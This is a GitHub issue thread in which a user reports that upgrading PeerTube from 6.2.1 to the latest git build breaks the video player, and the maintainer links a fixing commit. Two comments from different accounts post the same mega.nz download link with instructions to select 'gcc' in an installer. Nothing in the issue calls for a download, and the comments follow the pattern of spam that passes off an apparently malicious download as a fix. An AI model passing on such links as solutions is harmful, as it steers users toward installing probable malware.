### ISSUE TITLE
Upgrade from 6.2.1 to git latest version completely breaks player  

### ISSUE THREAD

**Issue by ilfarpro** [Chocobozzz/PeerTube#6555]
### Describe the current behavior

![image](https://github.com/user-attachments/assets/c67e9267-0f04-4eb3-ae0d-6576b182eccb)

### Steps to reproduce

1. Upgrade from 6.2.1 to latest build from git (or visit vanilla.22x22.ru)
2. Open any video page. See that player not renders and can't play videos.
3. Open browser console to see errors

This deployment is in docker container, i'm sure that /app/dist is not persistent volume with mixed content from previous version of Peertube.

No errors in HAR file

Checked in incognito mode to make sure that it's not browser cache

### Additional information

* PeerTube instance:
  * URL: vanilla.22x22.ru
  * Version: 6.2.1+ git
  * NodeJS version: v18.20.4
  * Ffmpeg version:  5.1.6-0+deb12u1

* Browser name, version and platforms on which you could reproduce the bug: Chrome 127.0.6533.122
* Link to browser console log if relevant:
![image](https://github.com/user-attachments/assets/283701ed-d294-4d52-bee5-1219f26c0040)

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Chocobozzz** [comment]
Thanks :pray: 

Should be fixed by https://github.com/Chocobozzz/PeerTube/commit/e740e2ea3f6863bae664d5faa623d5f78c8bed00
